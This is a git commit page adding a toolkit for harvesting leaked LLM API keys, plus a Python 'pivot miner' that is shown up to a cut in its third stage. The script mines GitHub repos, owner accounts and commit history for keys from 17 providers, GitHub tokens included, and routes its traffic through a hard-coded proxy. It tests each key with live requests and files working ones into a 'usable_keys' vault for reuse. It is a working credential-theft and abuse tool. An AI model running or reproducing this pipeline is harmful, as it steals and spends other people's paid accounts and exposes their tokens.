Add LLM key-hunter toolkit, vault, and skill
- tools/scripts/llm-key-hunter: GitHub leak hunting pipeline (hunt_*, pivot miner, two-layer verify/content caches, per-provider verification) - usable_keys: verified key vault across 12 providers (deepseek, minimax, volcanoark, longcat, codingplan, zhipu free-tier, mimo, siliconflow, etc.) - .grok/skills/llm-key-hunter: operator skill for the hunt/verify/vault flow - NewAPI channel import scripts and CDP capture helpers - Result verdict buckets (excluding multi-GB blob caches and dedup dumps)
This commit is contained in:
1 parent
a3f698806b
commit
5d215e1649
684 files changed
+133838
No files matched your search
@@ -0,0 +1,750 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Horizontal pivot miner.
|
||||
|
||||
From every known LEAKED key source (usable_keys/*/keys.json "source" URLs),
|
||||
pivot laterally to find MORE credentials:
|
||||
|
||||
Stage 1 Same repo -> pull the whole git tree, fetch high-value files
|
||||
(.env*, config, secrets, yaml, py, js, json, ...)
|
||||
and extract all known LLM key formats.
|
||||
Stage 2 Same owner -> list the owner's other public repos, fetch their
|
||||
root-level dotfiles/config/README, extract keys.
|
||||
Stage 3 Same file -> list commits touching the seed file, fetch each
|
||||
historical blob version, recover deleted keys.
|
||||
|
||||
All raw blob fetches are keyed by immutable (repo,path,sha) through
|
||||
ContentCache so unchanged files are never re-crawled.
|
||||
"""
|
||||
import argparse, json, os, re, subprocess, sys, time
|
||||
import urllib.request, urllib.error, urllib.parse
|
||||
from concurrent.futures import ThreadPoolExecutor, as_completed
|
||||
from pathlib import Path
|
||||
|
||||
sys.path.insert(0, str(Path(__file__).resolve().parent))
|
||||
from content_cache import ContentCache, parse_raw_url
|
||||
|
||||
HERE = Path(__file__).resolve().parent
|
||||
VAULT = HERE / "usable_keys"
|
||||
RESULTS = HERE / "results" / "pivot"
|
||||
RESULTS.mkdir(parents=True, exist_ok=True)
|
||||
CAND_FILE = RESULTS / "candidates.txt"
|
||||
CHECKPOINT = RESULTS / "candidates.checkpoint.json"
|
||||
|
||||
GH_PROXY = os.environ.get("GH_PROXY", "http://114.111.19.228:3389")
|
||||
UA = "Mozilla/5.0 key-hunter"
|
||||
|
||||
_gh = None
|
||||
def gh_opener():
|
||||
global _gh
|
||||
if _gh is None:
|
||||
if GH_PROXY:
|
||||
h = urllib.request.ProxyHandler({"http": GH_PROXY, "https": GH_PROXY})
|
||||
_gh = urllib.request.build_opener(h)
|
||||
else:
|
||||
_gh = urllib.request.build_opener()
|
||||
return _gh
|
||||
|
||||
_direct = None
|
||||
def direct_opener():
|
||||
global _direct
|
||||
if _direct is None:
|
||||
_direct = urllib.request.build_opener(urllib.request.ProxyHandler({}))
|
||||
return _direct
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# GitHub API helpers
|
||||
# ---------------------------------------------------------------------------
|
||||
def github_token():
|
||||
tok = os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN")
|
||||
if tok:
|
||||
return tok
|
||||
try:
|
||||
out = subprocess.run(["gh", "auth", "token"], capture_output=True,
|
||||
text=True, timeout=10)
|
||||
if out.returncode == 0:
|
||||
return out.stdout.strip()
|
||||
except FileNotFoundError:
|
||||
pass
|
||||
hosts = Path.home() / ".config" / "gh" / "hosts.yml"
|
||||
if hosts.exists():
|
||||
for line in hosts.read_text().splitlines():
|
||||
line = line.strip()
|
||||
if line.startswith("oauth_token:"):
|
||||
return line.split(":", 1)[1].strip()
|
||||
return None
|
||||
|
||||
def gh_api(url, token, wants_json=True):
|
||||
headers = {"Accept": "application/vnd.github+json", "User-Agent": "key-hunter"}
|
||||
if token:
|
||||
headers["Authorization"] = f"Bearer {token}"
|
||||
req = urllib.request.Request(url, headers=headers)
|
||||
for attempt in range(6):
|
||||
try:
|
||||
with gh_opener().open(req, timeout=30) as resp:
|
||||
raw = resp.read()
|
||||
return json.loads(raw) if wants_json else raw
|
||||
except urllib.error.HTTPError as e:
|
||||
if e.code in (403, 429):
|
||||
reset = e.headers.get("X-RateLimit-Reset")
|
||||
wait = max(int(reset) - int(time.time()), 5) if reset else 30
|
||||
print(f" rate-limited, waiting {wait}s...", file=sys.stderr)
|
||||
time.sleep(wait + 1)
|
||||
continue
|
||||
if e.code in (404, 451):
|
||||
return None
|
||||
try:
|
||||
e.read()
|
||||
except Exception:
|
||||
pass
|
||||
return None
|
||||
except Exception as e:
|
||||
print(f" network: {e}", file=sys.stderr)
|
||||
time.sleep(3)
|
||||
return None
|
||||
|
||||
def fetch_raw(url):
|
||||
req = urllib.request.Request(url, headers={"User-Agent": UA})
|
||||
try:
|
||||
with gh_opener().open(req, timeout=20) as resp:
|
||||
return resp.read().decode("utf-8", "replace")
|
||||
except Exception:
|
||||
return ""
|
||||
|
||||
def make_cached_fetch(cc, fetcher=fetch_raw):
|
||||
def cached(url):
|
||||
repo, sha, path = parse_raw_url(url)
|
||||
if repo and sha and path:
|
||||
txt = cc.get(repo, path, sha)
|
||||
if txt is not None:
|
||||
return txt
|
||||
txt = fetcher(url)
|
||||
if txt:
|
||||
cc.put(repo, path, sha, txt)
|
||||
return txt
|
||||
return fetcher(url)
|
||||
return cached
|
||||
|
||||
# raw.githubusercontent.com refuses a blob SHA as the ref (404); it needs a
|
||||
# branch/commit ref. So fetch by branch ref but key the cache on the immutable
|
||||
# blob SHA we already got from the tree/contents API.
|
||||
def fetch_blob(repo, path, blob_sha, branch, cc):
|
||||
if blob_sha and len(blob_sha) == 40:
|
||||
hit = cc.get(repo.lower(), path, blob_sha)
|
||||
if hit is not None:
|
||||
return hit
|
||||
ref = branch or "HEAD"
|
||||
txt = fetch_raw(
|
||||
f"https://raw.githubusercontent.com/{repo}/{ref}/{path}")
|
||||
if txt and blob_sha and len(blob_sha) == 40:
|
||||
cc.put(repo.lower(), path, blob_sha, txt)
|
||||
return txt
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Key format registry. Each pattern -> provider label + (scheme, host, path,
|
||||
# model, auth-header style). We extract ALL formats from every pivoted file.
|
||||
# Order matters: more specific prefixes first so sk-cp-/sk-sp-/sk-cx- are not
|
||||
# swallowed by a generic sk- pattern.
|
||||
# ---------------------------------------------------------------------------
|
||||
PROVIDERS = {}
|
||||
|
||||
def _reg(name, pattern, base, models=(), auth="Bearer",
|
||||
chat_path="/v1/chat/completions", context=None):
|
||||
PROVIDERS[name] = {
|
||||
"re": re.compile(pattern),
|
||||
"base": base,
|
||||
"models": models,
|
||||
"auth": auth,
|
||||
"chat_path": chat_path,
|
||||
"context": [c.lower() for c in context] if context else None,
|
||||
}
|
||||
|
||||
# Chinese coding plans / specialist
|
||||
_reg("mimo", r"sk-cx-[A-Za-z0-9]{48}", "https://api.xiaomimimo.com",
|
||||
models=("mimo-v2.5", "mimo-v2"), auth="Bearer")
|
||||
_reg("minimax", r"sk-cp-[A-Za-z0-9_\-]{130,}", "https://api.minimaxi.com",
|
||||
models=("MiniMax-M2.5", "abab6.5s-chat"))
|
||||
_reg("codingplan", r"sk-sp-[0-9a-fA-F]{32}", "https://coding.dashscope.aliyuncs.com",
|
||||
models=("qwen3-coder-plus", "qwen-coder-plus"))
|
||||
_reg("longcat", r"ak_[0-9A-Za-z]{29}", "https://api.longcat.chat",
|
||||
models=("LongCat-2.0-Chat", "LongCat-2.0"))
|
||||
_reg("zyloo", r"sk-zy-[0-9A-Za-z]{20,}", "https://api.zyloo.io",
|
||||
models=("Zyloo-1",))
|
||||
# Generic LLM keys
|
||||
_reg("deepseek", r"sk-[a-f0-9]{32}", "https://api.deepseek.com",
|
||||
models=("deepseek-chat",))
|
||||
_reg("dashscope", r"sk-[a-f0-9]{32}", "https://dashscope.aliyuncs.com",
|
||||
models=("qwen-plus",))
|
||||
_reg("moonshot", r"sk-[A-Za-z0-9]{40,60}", "https://api.moonshot.cn",
|
||||
models=("moonshot-v1-8k",))
|
||||
_reg("siliconflow",r"sk-[A-Za-z0-9]{48}", "https://api.siliconflow.cn",
|
||||
models=("deepseek-ai/DeepSeek-V3",))
|
||||
_reg("volcanoark", r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}",
|
||||
"https://ark.cn-beijing.volces.com",
|
||||
models=("doubao-seed-1-6-250615",),
|
||||
context=("ark_api_key", "volc_accesskey", "volc_secret",
|
||||
"api_key", "apikey", "authorization", "bearer",
|
||||
"ark.cn-beijing.volces.com/api/v3", "base_url"))
|
||||
_reg("xunfei", r"[0-9a-f]{32}",
|
||||
"https://maas-coding-api.cn-huabei-1.xf-yun.com",
|
||||
models=("xunfei-coding-plan",),
|
||||
context=("xf-yun.com", "xfyun", "xunfei", "iflytek",
|
||||
"spark-api", "maas-coding-api"))
|
||||
_reg("openai", r"sk-[A-Za-z0-9]{48,}", "https://api.openai.com",
|
||||
models=("gpt-4o-mini",))
|
||||
_reg("anthropic", r"sk-ant-[A-Za-z0-9_\-]{80,}", "https://api.anthropic.com",
|
||||
models=("claude-3-5-haiku-latest",), auth="x-api-key",
|
||||
chat_path="/v1/messages")
|
||||
_reg("groq", r"gsk_[A-Za-z0-9]{52}", "https://api.groq.com",
|
||||
models=("llama-3.1-8b-instant",))
|
||||
_reg("github_pat", r"gh[pousr]_[A-Za-z0-9]{36,}", "")
|
||||
_reg("openrouter", r"sk-or-v1-[0-9a-f]{64}", "https://openrouter.ai",
|
||||
models=("openai/gpt-4o-mini",))
|
||||
_reg("together", r"[0-9a-f]{64}",
|
||||
"https://api.together.xyz",
|
||||
models=("meta-llama/Llama-3.1-8B-Instruct-Turbo",),
|
||||
context=("together.xyz", "togetherai", "together_api",
|
||||
"TOGETHER_API_KEY"))
|
||||
|
||||
# dedup across providers: longest/most-prefixed match wins for a given span
|
||||
PREF_ORDER = ["mimo", "minimax", "codingplan", "longcat", "zyloo",
|
||||
"anthropic", "groq", "github_pat", "openrouter",
|
||||
"siliconflow", "moonshot", "openai",
|
||||
"deepseek", "dashscope", "xunfei", "volcanoark", "together"]
|
||||
|
||||
BLACKLIST = ("your-", "example", "placeholder", "test", "xxxx", "00000000",
|
||||
"1234567890abcdef", "changeme", "dummy", "fake", "redacted")
|
||||
|
||||
def looks_real(k):
|
||||
low = k.lower()
|
||||
return not any(b in low for b in BLACKLIST)
|
||||
|
||||
def extract_all(text):
|
||||
"""Return {provider: set(keys)} found in text, longest-prefix-wins.
|
||||
|
||||
For providers with a 'context' requirement (ambiguous shapes like bare
|
||||
UUIDs/hex), a match is only accepted if text within +/-80 chars around
|
||||
the match contains a provider assignment marker (api key / base url)."""
|
||||
low = (text or "").lower()
|
||||
spans = [] # (start, end, key, provider)
|
||||
for prov in PREF_ORDER:
|
||||
spec = PROVIDERS[prov]
|
||||
markers = spec.get("context")
|
||||
for m in spec["re"].finditer(text or ""):
|
||||
k = m.group(0)
|
||||
if not looks_real(k):
|
||||
continue
|
||||
if markers:
|
||||
lo = max(0, m.start() - 80)
|
||||
hi = min(len(low), m.end() + 80)
|
||||
window = low[lo:hi]
|
||||
if not any(c in window for c in markers):
|
||||
continue
|
||||
spans.append((m.start(), m.end(), k, prov))
|
||||
# sort by start then longer-first; greedy overlap removal
|
||||
spans.sort(key=lambda s: (s[0], -(s[1] - s[0])))
|
||||
out = {}
|
||||
occupied = []
|
||||
for st, en, k, prov in spans:
|
||||
if any(st < e and en > s for s, e in occupied):
|
||||
continue
|
||||
occupied.append((st, en))
|
||||
out.setdefault(prov, set()).add(k)
|
||||
return out
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Verification (direct, no proxy). Only 401 => DEAD.
|
||||
# ---------------------------------------------------------------------------
|
||||
def http_chat(provider, key, timeout=25):
|
||||
p = PROVIDERS[provider]
|
||||
if not p["base"]:
|
||||
return 0, "no-endpoint"
|
||||
url = p["base"].rstrip("/") + p["chat_path"]
|
||||
headers = {"User-Agent": UA, "Content-Type": "application/json"}
|
||||
if p["auth"] == "x-api-key":
|
||||
headers["x-api-key"] = key
|
||||
headers["anthropic-version"] = "2023-06-01"
|
||||
else:
|
||||
headers["Authorization"] = f"Bearer {key}"
|
||||
model = p["models"][0] if p["models"] else "gpt-4o-mini"
|
||||
if provider == "anthropic":
|
||||
body = {"model": model, "max_tokens": 4,
|
||||
"messages": [{"role": "user", "content": "hi"}]}
|
||||
else:
|
||||
body = {"model": model, "max_tokens": 1,
|
||||
"messages": [{"role": "user", "content": "hi"}]}
|
||||
data = json.dumps(body).encode()
|
||||
req = urllib.request.Request(url, data=data, headers=headers, method="POST")
|
||||
try:
|
||||
with direct_opener().open(req, timeout=timeout) as resp:
|
||||
return resp.getcode(), resp.read().decode("utf-8", "replace")
|
||||
except urllib.error.HTTPError as e:
|
||||
try:
|
||||
return e.code, e.read().decode("utf-8", "replace")
|
||||
except Exception:
|
||||
return e.code, ""
|
||||
except Exception as e:
|
||||
return 0, f"network: {type(e).__name__}: {e}"
|
||||
|
||||
def verify(provider, key):
|
||||
code, body = http_chat(provider, key)
|
||||
bl = (body or "").lower()
|
||||
if code == 200:
|
||||
if '"choices"' in bl or '"content"' in bl or '"id"' in bl:
|
||||
return "USABLE", f"chat 200 OK ({body[:80]})"
|
||||
if any(x in bl for x in ("balance", "quota", "arrear", "insufficient")):
|
||||
return "NO_BALANCE", f"chat: {body[:100]}"
|
||||
return "USABLE", f"chat: {body[:100]}"
|
||||
if code == 401:
|
||||
return "DEAD", "401 unauthorized"
|
||||
if code in (402, 429):
|
||||
return "NO_BALANCE", f"chat HTTP {code}: {body[:100]}"
|
||||
if code == 0:
|
||||
return "UNKNOWN", body[:120]
|
||||
return "NO_ACCESS", f"chat HTTP {code}: {body[:100]}"
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Seed collection from vault
|
||||
# ---------------------------------------------------------------------------
|
||||
HTML_RE = re.compile(r"https://github\.com/([^/]+/[^/]+)/blob/([^/]+)/(.*)")
|
||||
|
||||
def parse_source(url):
|
||||
if not url:
|
||||
return None, None, None, None
|
||||
m = HTML_RE.search(url)
|
||||
if not m:
|
||||
return None, None, None, None
|
||||
repo, sha, path = m.group(1), m.group(2), m.group(3)
|
||||
owner = repo.split("/", 1)[0]
|
||||
return owner, repo, sha, urllib.parse.unquote(path)
|
||||
|
||||
def collect_seeds():
|
||||
"""Return list of (owner, repo, sha, path, vault_provider) from vault."""
|
||||
seeds = []
|
||||
for kf in sorted(VAULT.glob("*/keys.json")):
|
||||
prov = kf.parent.name
|
||||
try:
|
||||
arr = json.loads(kf.read_text())
|
||||
except Exception:
|
||||
continue
|
||||
if isinstance(arr, dict):
|
||||
arr = [arr]
|
||||
for entry in arr:
|
||||
if not isinstance(entry, dict):
|
||||
continue
|
||||
o, r, s, p = parse_source(entry.get("source", ""))
|
||||
if r:
|
||||
seeds.append((o, r, s, p, prov))
|
||||
return seeds
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Stage 1: same-repo full tree walk -> high-value files
|
||||
# ---------------------------------------------------------------------------
|
||||
HOT_EXT = (".env", ".env.local", ".env.production", ".env.development",
|
||||
".yaml", ".yml", ".json", ".toml", ".ini", ".conf", ".config",
|
||||
".py", ".js", ".ts", ".jsx", ".tsx", ".go", ".java", ".rb",
|
||||
".php", ".sh", ".ps1", ".properties", ".txt", ".md", ".example",
|
||||
".local", ".secret", ".cfg")
|
||||
HOT_NAMES = (".env", "config", "secret", "credential", "apikey", "api_key",
|
||||
"key", "token", "auth", "setting", "constant", "default",
|
||||
"application", "app", "env", "private")
|
||||
SKIP_DIRS = ("node_modules", ".git", "vendor", "dist", "build", "__pycache__",
|
||||
".next", "target", "venv", ".venv", "site-packages", ".tox")
|
||||
MAX_FILES_PER_REPO = 120
|
||||
MAX_BYTES = 900_000
|
||||
|
||||
def is_hot(path):
|
||||
low = path.lower()
|
||||
base = low.rsplit("/", 1)[-1]
|
||||
if any(sd + "/" in low for sd in SKIP_DIRS):
|
||||
return False
|
||||
if base.startswith(".env") or base.endswith(".env"):
|
||||
return 3 # highest priority
|
||||
if any(h in base for h in ("secret", "credential", "apikey", "api_key",
|
||||
"token", "auth", "private")):
|
||||
return 3
|
||||
if any(h in base for h in ("config", "setting", "constant", "default",
|
||||
"application", "app", "env")):
|
||||
return 2
|
||||
if any(low.endswith(e) for e in (".secret", ".cfg", ".ini", ".conf",
|
||||
".properties", ".local", ".pem",
|
||||
".key")):
|
||||
return 2
|
||||
if low.endswith((".yaml", ".yml", ".toml", ".json")):
|
||||
return 1
|
||||
if low.endswith((".py", ".js", ".ts", ".jsx", ".tsx", ".go", ".java",
|
||||
".rb", ".php", ".sh", ".ps1")):
|
||||
return 1
|
||||
return 0
|
||||
|
||||
def repo_tree_paths(repo, token):
|
||||
"""Use git/trees?recursive=1 on default branch; yield (prio,path,sha,branch)."""
|
||||
data = gh_api(f"https://api.github.com/repos/{repo}", token)
|
||||
if not data:
|
||||
return
|
||||
branch = data.get("default_branch", "main")
|
||||
url = (f"https://api.github.com/repos/{repo}/git/trees/"
|
||||
f"{branch}?recursive=1")
|
||||
tree = gh_api(url, token)
|
||||
if not tree or "tree" not in tree:
|
||||
return
|
||||
for node in tree.get("tree", []):
|
||||
prio = is_hot(node.get("path", ""))
|
||||
if node.get("type") == "blob" and prio:
|
||||
yield prio, node["path"], node.get("sha", ""), branch
|
||||
if tree.get("truncated"):
|
||||
print(f" [warn] {repo} tree truncated, results partial",
|
||||
file=sys.stderr)
|
||||
|
||||
def stage_repo(repo, token, cc, candidates, seen_files, stats,
|
||||
fetch_workers=12):
|
||||
scored = sorted(repo_tree_paths(repo, token),
|
||||
key=lambda t: -t[0])[:MAX_FILES_PER_REPO]
|
||||
jobs = []
|
||||
for _prio, path, bsha, branch in scored:
|
||||
key = (repo.lower(), path.lower(), str(bsha).lower())
|
||||
if key in seen_files:
|
||||
continue
|
||||
seen_files.add(key)
|
||||
jobs.append((path, bsha, branch))
|
||||
|
||||
def _fetch(job):
|
||||
path, bsha, branch = job
|
||||
return path, fetch_blob(repo, path, bsha, branch, cc)
|
||||
|
||||
with ThreadPoolExecutor(max_workers=fetch_workers) as ex:
|
||||
for path, txt in ex.map(_fetch, jobs):
|
||||
if not txt or len(txt) > MAX_BYTES:
|
||||
continue
|
||||
for prov, keys in extract_all(txt).items():
|
||||
for k in keys:
|
||||
if k not in candidates:
|
||||
candidates[k] = (prov, f"{repo}/{path}")
|
||||
stats["files_with_keys"] += 1
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Stage 2: same-owner other repos
|
||||
# ---------------------------------------------------------------------------
|
||||
def owner_repos(owner, token, max_repos=30):
|
||||
for page in range(1, 3):
|
||||
url = ("https://api.github.com/users/"
|
||||
f"{urllib.parse.quote(owner)}/repos?per_page=100&page={page}"
|
||||
"&sort=updated&type=owner")
|
||||
data = gh_api(url, token)
|
||||
if not data:
|
||||
return
|
||||
for r in data:
|
||||
if r.get("fork"):
|
||||
continue
|
||||
name = r.get("full_name", "")
|
||||
if name and name.lower().split("/", 1)[0] == owner.lower():
|
||||
yield name
|
||||
if len(data) < 100:
|
||||
return
|
||||
|
||||
ROOT_HOT = (".env", ".env.local", ".env.production", "config.json",
|
||||
"config.yaml", "config.yml", "config.toml", "settings.json",
|
||||
"appsettings.json", "application.yml", "application.yaml",
|
||||
"secrets.json", ".env.example", "README.md", ".env.sample")
|
||||
|
||||
def stage_owner(owner, exclude_repo, token, cc, candidates,
|
||||
seen_files, stats):
|
||||
nrepos = 0
|
||||
for repo in owner_repos(owner, token):
|
||||
if repo.lower() == exclude_repo.lower():
|
||||
continue
|
||||
nrepos += 1
|
||||
if nrepos > 30:
|
||||
break
|
||||
meta = gh_api(f"https://api.github.com/repos/{repo}", token)
|
||||
branch = (meta or {}).get("default_branch", "main")
|
||||
url = f"https://api.github.com/repos/{repo}/contents/"
|
||||
items = gh_api(url, token)
|
||||
if not items:
|
||||
continue
|
||||
for it in items:
|
||||
if not isinstance(it, dict):
|
||||
continue
|
||||
p = it.get("path", "")
|
||||
if it.get("type") == "file" and (p.lower() in ROOT_HOT or
|
||||
is_hot(p)):
|
||||
bsha = it.get("sha", "")
|
||||
key = (repo.lower(), p.lower(), str(bsha).lower())
|
||||
if key in seen_files:
|
||||
continue
|
||||
seen_files.add(key)
|
||||
txt = fetch_blob(repo, p, bsha, branch, cc)
|
||||
if not txt or len(txt) > MAX_BYTES:
|
||||
continue
|
||||
for prov, keys in extract_all(txt).items():
|
||||
for k in keys:
|
||||
if k not in candidates:
|
||||
candidates[k] = (prov, f"{repo}/HEAD/{p}")
|
||||
stats["files_with_keys"] += 1
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Stage 3: per-seed-file commit history
|
||||
# ---------------------------------------------------------------------------
|
||||
def list_file_commits(repo, path, token, max_commits=6):
|
||||
url = ("https://api.github.com/repos/" + repo + "/commits"
|
||||
f"?path={urllib.parse.quote(path)}&per_page={max_commits}")
|
||||
data = gh_api(url, token)
|
||||
if not data:
|
||||
return []
|
||||
out = []
|
||||
for c in data:
|
||||
try:
|
||||
out.append(c["sha"])
|
||||
except Exception:
|
||||
pass
|
||||
return out
|
||||
|
||||
def stage_history(owner, repo, sha, path, token, cached_fetch,
|
||||
candidates, seen_files, stats):
|
||||
for csha in list_file_commits(repo, path, token):
|
||||
url = f"https://raw.githubusercontent.com/{repo}/{csha}/{path}"
|
||||
key = (repo.lower(), path.lower(), csha.lower())
|
||||
if key in seen_files:
|
||||
continue
|
||||
seen_files.add(key)
|
||||
txt = cached_fetch(url)
|
||||
if not txt or len(txt) > MAX_BYTES:
|
||||
continue
|
||||
for prov, keys in extract_all(txt).items():
|
||||
for k in keys:
|
||||
if k not in candidates:
|
||||
candidates[k] = (prov, f"{repo}@{csha[:8]}/{path}")
|
||||
stats["files_with_keys"] += 1
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Driver
|
||||
# ---------------------------------------------------------------------------
|
||||
def load_existing():
|
||||
"""Keys already known in vault -> set, to skip re-verifying."""
|
||||
known = set()
|
||||
for kf in VAULT.glob("*/keys.json"):
|
||||
try:
|
||||
arr = json.loads(kf.read_text())
|
||||
except Exception:
|
||||
continue
|
||||
if isinstance(arr, dict):
|
||||
arr = [arr]
|
||||
for e in arr:
|
||||
if isinstance(e, dict) and e.get("key"):
|
||||
known.add(e["key"])
|
||||
return known
|
||||
|
||||
def verify_candidates(candidates, workers, use_cache=True):
|
||||
from verify_cache import CachedVerifier
|
||||
# group by provider
|
||||
by_prov = {}
|
||||
for k, (prov, src) in candidates.items():
|
||||
if not PROVIDERS[prov]["base"]:
|
||||
continue # no endpoint (github_pat etc) - skip chat verify
|
||||
by_prov.setdefault(prov, []).append((k, src))
|
||||
|
||||
verdicts = {v: [] for v in ("USABLE", "NO_BALANCE", "NO_ACCESS",
|
||||
"DEAD", "UNKNOWN")}
|
||||
for prov, items in sorted(by_prov.items()):
|
||||
print(f" [verify] {prov}: {len(items)} candidates")
|
||||
def vfn(k, _prov=prov):
|
||||
return verify(_prov, k)
|
||||
if use_cache:
|
||||
ver = CachedVerifier(f"pivot_{prov}", vfn)
|
||||
ver.__enter__()
|
||||
else:
|
||||
ver = None
|
||||
try:
|
||||
with ThreadPoolExecutor(max_workers=workers) as ex:
|
||||
futs = {ex.submit(ver if ver else vfn, k): (k, src)
|
||||
for k, src in items}
|
||||
for fut in as_completed(futs):
|
||||
k, src = futs[fut]
|
||||
try:
|
||||
v, d = fut.result()
|
||||
except Exception as e:
|
||||
v, d = "UNKNOWN", str(e)
|
||||
verdicts.setdefault(v, []).append((k, src, d))
|
||||
if v == "USABLE":
|
||||
print(f" [+] USABLE {prov} {k[:18]}... {src}")
|
||||
finally:
|
||||
if ver:
|
||||
ver.__exit__(None, None, None)
|
||||
return verdicts
|
||||
|
||||
def write_candidates(candidates):
|
||||
with open(CAND_FILE, "w") as f:
|
||||
for k, (prov, src) in sorted(candidates.items(),
|
||||
key=lambda x: (x[1][0], x[0])):
|
||||
f.write(f"{prov}\t{k}\t{src}\n")
|
||||
|
||||
def write_verdicts(verdicts):
|
||||
summary = {}
|
||||
for v, rows in verdicts.items():
|
||||
with open(RESULTS / f"{v.lower()}.txt", "w") as f:
|
||||
for k, src, d in rows:
|
||||
f.write(f"{k}\t{src}\t{d}\n")
|
||||
summary[v] = len(rows)
|
||||
with open(RESULTS / "summary.json", "w") as f:
|
||||
json.dump(summary, f, indent=2)
|
||||
print("=== verdicts:", summary)
|
||||
|
||||
def main():
|
||||
ap = argparse.ArgumentParser()
|
||||
ap.add_argument("--workers", type=int, default=16)
|
||||
ap.add_argument("--fetch-workers", type=int, default=12)
|
||||
ap.add_argument("--no-owner", action="store_true",
|
||||
help="skip stage 2 (owner repo pivot)")
|
||||
ap.add_argument("--no-history", action="store_true",
|
||||
help="skip stage 3 (commit history)")
|
||||
ap.add_argument("--no-tree", action="store_true",
|
||||
help="skip stage 1 (same-repo tree)")
|
||||
ap.add_argument("--no-content-cache", action="store_true")
|
||||
ap.add_argument("--no-cache", action="store_true",
|
||||
help="skip verdict cache")
|
||||
ap.add_argument("--verify-only", action="store_true")
|
||||
ap.add_argument("--reextract", action="store_true",
|
||||
help="re-extract from cached blobs with tightened "
|
||||
"patterns (no network), then verify")
|
||||
ap.add_argument("--max-repos", type=int, default=0,
|
||||
help="limit seed repos (0=all)")
|
||||
args = ap.parse_args()
|
||||
|
||||
token = github_token()
|
||||
if not token:
|
||||
print("WARNING: no GitHub token; rate limits will be tight",
|
||||
file=sys.stderr)
|
||||
|
||||
seeds = collect_seeds()
|
||||
print(f"seeds: {len(seeds)} leaked-key sources")
|
||||
if args.max_repos:
|
||||
seeds = seeds[:args.max_repos]
|
||||
|
||||
# dedup seed repos / owners
|
||||
seed_repos = sorted({s[1] for s in seeds})
|
||||
seed_owners = sorted({s[0] for s in seeds})
|
||||
print(f" {len(seed_repos)} distinct repos, {len(seed_owners)} owners")
|
||||
|
||||
if args.verify_only:
|
||||
cand = {}
|
||||
for line in CAND_FILE.read_text().splitlines():
|
||||
parts = line.split("\t")
|
||||
if len(parts) == 3:
|
||||
cand[parts[1]] = (parts[0], parts[2])
|
||||
print(f"loaded {len(cand)} candidates from {CAND_FILE}")
|
||||
verdicts = verify_candidates(cand, args.workers,
|
||||
use_cache=not args.no_cache)
|
||||
write_verdicts(verdicts)
|
||||
return
|
||||
|
||||
if args.reextract:
|
||||
print("[reextract] scanning cached blobs with tightened patterns")
|
||||
known = load_existing()
|
||||
cc = ContentCache(force=args.no_content_cache)
|
||||
cc.__enter__()
|
||||
candidates = {}
|
||||
nfiles = 0
|
||||
for repo, files in cc._data.items():
|
||||
for path, versions in files.items():
|
||||
for sha, ent in versions.items():
|
||||
txt = ent.get("c", "") if isinstance(ent, dict) else ""
|
||||
if not txt:
|
||||
continue
|
||||
nfiles += 1
|
||||
src = f"{repo}/{path}"
|
||||
for prov, keys in extract_all(txt).items():
|
||||
for k in keys:
|
||||
if k not in known and k not in candidates:
|
||||
candidates[k] = (prov, src)
|
||||
cc.__exit__(None, None, None)
|
||||
print(f"[reextract] scanned {nfiles} blobs, "
|
||||
f"{len(candidates)} new candidates")
|
||||
write_candidates(candidates)
|
||||
if candidates:
|
||||
verdicts = verify_candidates(candidates, args.workers,
|
||||
use_cache=not args.no_cache)
|
||||
write_verdicts(verdicts)
|
||||
return
|
||||
|
||||
known = load_existing()
|
||||
print(f"already in vault: {len(known)} keys")
|
||||
|
||||
def save_checkpoint():
|
||||
try:
|
||||
tmp = str(CHECKPOINT) + ".tmp"
|
||||
with open(tmp, "w") as f:
|
||||
json.dump({"candidates": {k: list(v) for k, v in
|
||||
candidates.items()}}, f)
|
||||
os.replace(tmp, CHECKPOINT)
|
||||
except Exception as e:
|
||||
print(f" [warn] checkpoint failed: {e}", file=sys.stderr)
|
||||
|
||||
candidates = {}
|
||||
if CHECKPOINT.exists() and not args.no_cache:
|
||||
try:
|
||||
ch = json.loads(CHECKPOINT.read_text())
|
||||
for k, v in ch.get("candidates", {}).items():
|
||||
candidates[k] = tuple(v)
|
||||
print(f"resumed {len(candidates)} candidates from checkpoint")
|
||||
except Exception:
|
||||
pass
|
||||
stats = {"files_with_keys": 0}
|
||||
cc = ContentCache(force=args.no_content_cache)
|
||||
with cc:
|
||||
cf = make_cached_fetch(cc)
|
||||
seen_files = set()
|
||||
|
||||
# Stage 1: same repo tree
|
||||
if not args.no_tree:
|
||||
print(f"[stage 1] same-repo tree walk ({len(seed_repos)} repos)")
|
||||
for i, repo in enumerate(seed_repos, 1):
|
||||
stage_repo(repo, token, cc, candidates, seen_files, stats,
|
||||
fetch_workers=args.fetch_workers)
|
||||
if i % 5 == 0:
|
||||
save_checkpoint()
|
||||
if i % 10 == 0:
|
||||
print(f" {i}/{len(seed_repos)} repos, "
|
||||
f"{len(candidates)} candidates", flush=True)
|
||||
|
||||
# Stage 2: owner other repos
|
||||
if not args.no_owner:
|
||||
print(f"[stage 2] owner pivot ({len(seed_owners)} owners)")
|
||||
repo_owner = {s[1]: s[0] for s in seeds}
|
||||
for i, repo in enumerate(seed_repos, 1):
|
||||
owner = repo_owner.get(repo, repo.split("/", 1)[0])
|
||||
stage_owner(owner, repo, token, cc, candidates,
|
||||
seen_files, stats)
|
||||
time.sleep(1.0) # smooth request burst vs secondary rate limit
|
||||
if i % 5 == 0:
|
||||
save_checkpoint()
|
||||
if i % 10 == 0:
|
||||
print(f" {i}/{len(seed_repos)} owners, "
|
||||
f"{len(candidates)} candidates", flush=True)
|
||||
|
||||
# Stage 3: commit history per seed file
|
||||
if not args.no_history:
|
||||
print(f"[stage 3] commit history ({len(seeds)} seed files)")
|
||||
for i, (owner, repo, sha, path, prov) in enumerate(seeds, 1):
|
||||
stage_history(owner, repo, sha, path, token, cf,
|
||||
candidates, seen_files, stats)
|
||||
